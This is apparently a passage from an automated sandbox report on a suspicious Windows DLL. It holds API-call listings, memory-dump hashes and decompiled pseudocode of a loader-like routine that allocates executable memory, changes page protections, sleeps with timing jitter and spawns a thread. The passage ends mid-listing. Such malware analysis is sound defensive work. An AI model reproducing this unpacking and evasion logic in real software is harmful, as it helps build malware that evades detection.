                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457C7
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457D9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457EB
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457FD
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE4580F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 381ed92e3f1534d124e9050bffa1bb327f74dfe3a711358359adfa0a082634e3
                                                                                                                                                                                                                                                          • Instruction ID: 4c6ab16b10501415342094093a920ecc4d1ccb2ada109573dd0611fe0c28dfc9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 381ed92e3f1534d124e9050bffa1bb327f74dfe3a711358359adfa0a082634e3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F04932408225DBDB90DA59E8C4C7A73F9BB467187B28819F42CE7600CF31F890CEA4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                          • String ID: *?
                                                                                                                                                                                                                                                          • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                                          • Opcode ID: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                          • Instruction ID: 820e05b3ff5fe130afd44aac70e94c5517b75bf37d74d7d8dc87d43707ebdd3d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE617CB5E0421A9FCB14CFA9D8805EDFBF5EF88314B25816AE814F7340DB71AE418B90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6DE38E5F
                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6DE38F13
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                          • String ID: csm$ym
                                                                                                                                                                                                                                                          • API String ID: 3480331319-4111166203
                                                                                                                                                                                                                                                          • Opcode ID: e97a5bfdf0a398549adb7b33e8f400e3f6c969c3605169478636969f6cc65715
                                                                                                                                                                                                                                                          • Instruction ID: 8a3c281821601d0eeeb11ea45d9d104d5452530c8ee51a0dbc291200f708c902
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e97a5bfdf0a398549adb7b33e8f400e3f6c969c3605169478636969f6cc65715
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B41C7349141299BCF04DF69CCC4ABEBBB5BF4531CF228159D914AB351CB32EA41CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 6DE398AB
                                                                                                                                                                                                                                                          • CatchIt.LIBVCRUNTIME ref: 6DE39991
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                          • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                          • Opcode ID: d32ef6b4e60858bbd101c5b086ec171ac8ff0adf43bcebf84dc182cd933d817e
                                                                                                                                                                                                                                                          • Instruction ID: 42be1ce98b41d84d42d050a7c4c2d7ac66ee565f5f8038376faa1365163e1fce
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d32ef6b4e60858bbd101c5b086ec171ac8ff0adf43bcebf84dc182cd933d817e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C41597290422AAFCF05CF94CD80AFE7BB5BF48308F264099FA1977211DB35A951DB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,6DE6947C,00000000,?,?,6DE3C2C2,?,?,6DE3C28A,?,?,?), ref: 6DE3C325
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,6DE69494), ref: 6DE3C338
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,6DE3C2C2,?,?,6DE3C28A,?,?,?), ref: 6DE3C35B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                          • String ID: ym
                                                                                                                                                                                                                                                          • API String ID: 4061214504-2567925931
                                                                                                                                                                                                                                                          • Opcode ID: e639ec9dc02963fb2e5faf2fa4ed08f8fc0737349a26dd32cea1e44a59ea0dd8
                                                                                                                                                                                                                                                          • Instruction ID: 32957503c2ed312e37dd63c262b08937217ca9bbe547b66f44b02af49c5ecee7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e639ec9dc02963fb2e5faf2fa4ed08f8fc0737349a26dd32cea1e44a59ea0dd8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0F08231600129FBDF02AB51CD49BEE7BB4EB04755F2100A4E905B1250CF71CE41DA90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE46DAD
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE46DD6
                                                                                                                                                                                                                                                          • SetEndOfFile.KERNEL32(00000000,6DE44603,00000000,6DE3FCD2,?,?,?,?,?,?,?,6DE44603,6DE3FCD2,00000000), ref: 6DE46E08
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6DE44603,6DE3FCD2,00000000,?,?,?,?,00000000,?), ref: 6DE46E24
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1547350101-0
                                                                                                                                                                                                                                                          • Opcode ID: 41e4e567f892e7d43a927d8a63d1eef7c60e7ac347c2768b23d672e27d7eba09
                                                                                                                                                                                                                                                          • Instruction ID: 746c7ccaf5103844d251ff9d8718369262052cba81f2b4a5b76cedebaae49d0f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41e4e567f892e7d43a927d8a63d1eef7c60e7ac347c2768b23d672e27d7eba09
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 264117769046059BDB01AFB8EC00BEE37B5AF45368F32811CF624B72A0DF31D95587A1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DE410C1: _free.LIBCMT ref: 6DE410CF
                                                                                                                                                                                                                                                            • Part of subcall function 6DE41C1A: WideCharToMultiByte.KERNEL32(?,00000000,6DE3F667,00000000,00000001,6DE3F5F6,6DE43EDB,?,6DE3F667,?,00000000,?,6DE43C4A,0000FDE9,00000000,?), ref: 6DE41CBC
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6DE40B07
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6DE40B0E
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6DE40B4D
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6DE40B54
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 167067550-0
                                                                                                                                                                                                                                                          • Opcode ID: b838fe768b3ecd280991d33289ed03799240ae7edb2787f24f33488fc80e67da
                                                                                                                                                                                                                                                          • Instruction ID: 7d4071cadcf108e82e736539f580357e30e858956c8ca9733bc3adff1ab9b2a0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b838fe768b3ecd280991d33289ed03799240ae7edb2787f24f33488fc80e67da
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9721D871608616AFDB109FA79C80C6777BCEF5136C721C528F91897240DF31EC518B94
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2c34c66aeaf2d24ee903d642749afd8c60a49eb4fd9f96f7b5e5e4e13af7c5f2
                                                                                                                                                                                                                                                          • Instruction ID: 82098994c70efd8d4e3c45957d7e2b321e27556d5e411c82d170fecc0eb5ad0b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c34c66aeaf2d24ee903d642749afd8c60a49eb4fd9f96f7b5e5e4e13af7c5f2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F21D879E45222A7DF129AA5AC40B2F36A8AF03768F328115ED15B7380EF30E911C5E0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,6DE43991,?,00000001,6DE3F667,?,6DE43E50,00000001,?,?,?,6DE3F5F6,?,?), ref: 6DE3D3B1
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D40E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D444
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,6DE700D0,000000FF,?,6DE43E50,00000001,?,?,?,6DE3F5F6,?,?,?,6DE6EBD8,0000002C,6DE3F667), ref: 6DE3D44F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2283115069-0
                                                                                                                                                                                                                                                          • Opcode ID: c1932fa6e2cbb208a59f2db9ec2eb7e3d618850d039e36d3d59e1d066090d965
                                                                                                                                                                                                                                                          • Instruction ID: 602da665b5cb33fdff0c97ad21f4106d8734112eae75152d3f2ebf50e4edafbf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1932fa6e2cbb208a59f2db9ec2eb7e3d618850d039e36d3d59e1d066090d965
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20118D362082216BD75656759C84B7A21F9B7D267CF37452CF628E32D0DF618C11C521
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000001,00000001,6DE70096,6DE3D67C,6DE3D707,6DE70094,?,6DE37E19,6DE70096,6DE70094,?,?,?,6DE34DCE,00000001,6DE70098), ref: 6DE3D508
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D565
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D59B
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,6DE700D0,000000FF,?,6DE37E19,6DE70096,6DE70094,?,?,?,6DE34DCE,00000001,6DE70098), ref: 6DE3D5A6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2283115069-0
                                                                                                                                                                                                                                                          • Opcode ID: c0c1a87688513be15c6d931b705218486b8f37592f816dd83803608750a3eca5
                                                                                                                                                                                                                                                          • Instruction ID: e8e244a7054557dc06ddc2fe4966b906fe24a1379df690bf524f210871c4670e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0c1a87688513be15c6d931b705218486b8f37592f816dd83803608750a3eca5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2311A33A248321BAEB5256659C80F3A31B9A7D227CF334628F628E22C0DF628815C121
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,6DE3A304,?,?,6DE7C7C4,00000000,?,6DE3A42F,00000004,6DE693A4,6DE6939C,6DE693A4,00000000), ref: 6DE3A2D3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                                          • Opcode ID: c552bafe0f76c1889c5f5f5332c078ca48f1cb7a43a23984940150e32eb1eeee
                                                                                                                                                                                                                                                          • Instruction ID: 090efdac8c241f77240bde0cc2ff51d720eb31034e8731b7659798bb544ac53c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c552bafe0f76c1889c5f5f5332c078ca48f1cb7a43a23984940150e32eb1eeee
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F411A336AC5632ABDF129A688C40F7A33F8AB02764F234114FD10B7380DB71E981C6D1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(?,?,6DE3F667,00000000,?,?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001), ref: 6DE47C03
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001,00000000,00000001,?,6DE43E74,6DE3F5F6), ref: 6DE47C0F
                                                                                                                                                                                                                                                            • Part of subcall function 6DE47BD5: CloseHandle.KERNEL32(6DE70910,6DE47C1F,?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001,00000000,00000001), ref: 6DE47BE5
                                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 6DE47C1F
                                                                                                                                                                                                                                                            • Part of subcall function 6DE47B97: CreateFileW.KERNEL32(6DE6DD58,40000000,00000003,00000000,00000003,00000000,00000000,6DE47BC6,6DE46B6D,00000001,?,6DE43920,00000000,?,00000001,00000000), ref: 6DE47BAA
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(?,?,6DE3F667,00000000,?,6DE46B80,?,00000001,?,00000001,?,6DE43920,00000000,?,00000001,00000000), ref: 6DE47C34
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                                          • Opcode ID: 71442192e457935bb9fc9bebdd1fde22d1d08fb711d40f7acd0f666c89f47159
                                                                                                                                                                                                                                                          • Instruction ID: 857b38e379a6607ce46a2f58ef36bf43df82ef0b2be58f83381681d805834032
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71442192e457935bb9fc9bebdd1fde22d1d08fb711d40f7acd0f666c89f47159
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3F01C36501129BBDF626FD1DD08A9A3FB6EB4A3A4F118014FE18A5260CB328960DBD0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                                                                                                                                                                                                                                          • API String ID: 0-1872383224
                                                                                                                                                                                                                                                          • Opcode ID: c9fd5fa1f136a00acad8e2434a43b89b3b218200add9d67ef45a5da2d61128a3
                                                                                                                                                                                                                                                          • Instruction ID: 1177f8be6ac38978d84a475a5888ab8d44364a7ff606dbb0b8f5564a53dbfe10
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9fd5fa1f136a00acad8e2434a43b89b3b218200add9d67ef45a5da2d61128a3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18414771B44235ABDB12DF999C809BEBBF8EF86314F32405AE514A7340DB71DA41C754
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,0000079C,00003000,00000040,0000079C,6DE71E18), ref: 6DE72480
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,000000C6,00003000,00000040,6DE71E7C), ref: 6DE724B7
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00013F51,00003000,00000040), ref: 6DE72517
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DE7254D
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(6DDF0000,00000000,00000004,6DE723A2), ref: 6DE72652
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(6DDF0000,00001000,00000004,6DE723A2), ref: 6DE72679
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6DE723A2), ref: 6DE72746
                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6DE723A2,?), ref: 6DE7279C
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DE727B8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481945581.000000006DE71000.00000040.00020000.sdmp, Offset: 6DE71000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2574235972-0
                                                                                                                                                                                                                                                          • Opcode ID: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                          • Instruction ID: 0efb1801fed34ec62a7a663e9c3cf7a36147c5d7f49471c05b40fc200e059d46
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98D17E362002819FDF61CF54C880F5177A6FF58714B1A45A4EE0AAF75BEB31B850DB62
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                                                                                          			E6DDF17A7(intOrPtr _a4) {
                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                          				struct _SYSTEMTIME _v44;
                                                                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                                          				long _v56;
                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                          				long _t21;
                                                                                                                                                                                                                                                          				int _t23;
                                                                                                                                                                                                                                                          				long _t26;
                                                                                                                                                                                                                                                          				long _t27;
                                                                                                                                                                                                                                                          				long _t31;
                                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                                          				intOrPtr _t44;
                                                                                                                                                                                                                                                          				signed int _t45;
                                                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                                                                          				void* _t56;
                                                                                                                                                                                                                                                          				intOrPtr* _t57;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t21 = E6DDF146C();
                                                                                                                                                                                                                                                          				_v52 = _t21;
                                                                                                                                                                                                                                                          				if(_t21 != 0) {
                                                                                                                                                                                                                                                          					L18:
                                                                                                                                                                                                                                                          					return _t21;
                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                          					goto L1;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                          					L1:
                                                                                                                                                                                                                                                          					GetSystemTime( &_v44);
                                                                                                                                                                                                                                                          					_t23 = SwitchToThread();
                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                          					_t45 = 9;
                                                                                                                                                                                                                                                          					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
                                                                                                                                                                                                                                                          					_t26 = E6DDF15A3(0, _t54); // executed
                                                                                                                                                                                                                                                          					_v56 = _t26;
                                                                                                                                                                                                                                                          					Sleep(_t54 << 5); // executed
                                                                                                                                                                                                                                                          					_t21 = _v56;
                                                                                                                                                                                                                                                          				} while (_t21 == 0xc);
                                                                                                                                                                                                                                                          				if(_t21 != 0) {
                                                                                                                                                                                                                                                          					goto L18;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				_t27 = E6DDF1C12(_t45);
                                                                                                                                                                                                                                                          				_v52 = _t27;
                                                                                                                                                                                                                                                          				if(_t27 != 0) {
                                                                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                                                                          					_t21 = _v52;
                                                                                                                                                                                                                                                          					if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                          						_t21 = GetLastError();
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          					goto L18;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                                          					_t56 = E6DDF1CA4(E6DDF16EC,  &_v28);
                                                                                                                                                                                                                                                          					if(_t56 == 0) {
                                                                                                                                                                                                                                                          						_v56 = GetLastError();
                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                          						_t31 = WaitForSingleObject(_t56, 0xffffffff);
                                                                                                                                                                                                                                                          						_v56 = _t31;
                                                                                                                                                                                                                                                          						if(_t31 == 0) {
                                                                                                                                                                                                                                                          							GetExitCodeThread(_t56,  &_v56);
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          						CloseHandle(_t56);
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				if(E6DDF1D7C(_t45,  &_v48) != 0) {
                                                                                                                                                                                                                                                          					 *0x6ddf41b8 = 0;
                                                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				_t44 = _v48;
                                                                                                                                                                                                                                                          				_t57 = __imp__GetLongPathNameW;
                                                                                                                                                                                                                                                          				_t50 =  *_t57(_t44, 0, 0);
                                                                                                                                                                                                                                                          				if(_t50 == 0) {
                                                                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                                                                          					 *0x6ddf41b8 = _t44;
                                                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				_t15 = _t50 + 2; // 0x2
                                                                                                                                                                                                                                                          				_t39 = E6DDF1C8F(_t50 + _t15);
                                                                                                                                                                                                                                                          				 *0x6ddf41b8 = _t39;
                                                                                                                                                                                                                                                          				if(_t39 == 0) {
                                                                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                          					 *_t57(_t44, _t39, _t50);
                                                                                                                                                                                                                                                          					E6DDF136A(_t44);
                                                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                          0x6ddf17b3
                                                                                                                                                                                                                                                          0x6ddf17bc
                                                                                                                                                                                                                                                          0x6ddf17c0
                                                                                                                                                                                                                                                          0x6ddf18c8
                                                                                                                                                                                                                                                          0x6ddf18ce
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf17c6
                                                                                                                                                                                                                                                          0x6ddf17c6
                                                                                                                                                                                                                                                          0x6ddf17cb
                                                                                                                                                                                                                                                          0x6ddf17d1
                                                                                                                                                                                                                                                          0x6ddf17e0
                                                                                                                                                                                                                                                          0x6ddf17e1
                                                                                                                                                                                                                                                          0x6ddf17e4
                                                                                                                                                                                                                                                          0x6ddf17e7
                                                                                                                                                                                                                                                          0x6ddf17f0
                                                                                                                                                                                                                                                          0x6ddf17f4
                                                                                                                                                                                                                                                          0x6ddf17fa
                                                                                                                                                                                                                                                          0x6ddf17fe
                                                                                                                                                                                                                                                          0x6ddf1805
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf180b
                                                                                                                                                                                                                                                          0x6ddf1812
                                                                                                                                                                                                                                                          0x6ddf1816
                                                                                                                                                                                                                                                          0x6ddf18b9
                                                                                                                                                                                                                                                          0x6ddf18b9
                                                                                                                                                                                                                                                          0x6ddf18c0
                                                                                                                                                                                                                                                          0x6ddf18c2
                                                                                                                                                                                                                                                          0x6ddf18c2
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf18c0
                                                                                                                                                                                                                                                          0x6ddf181f
                                                                                                                                                                                                                                                          0x6ddf1872
                                                                                                                                                                                                                                                          0x6ddf1872
                                                                                                                                                                                                                                                          0x6ddf1883
                                                                                                                                                                                                                                                          0x6ddf1887
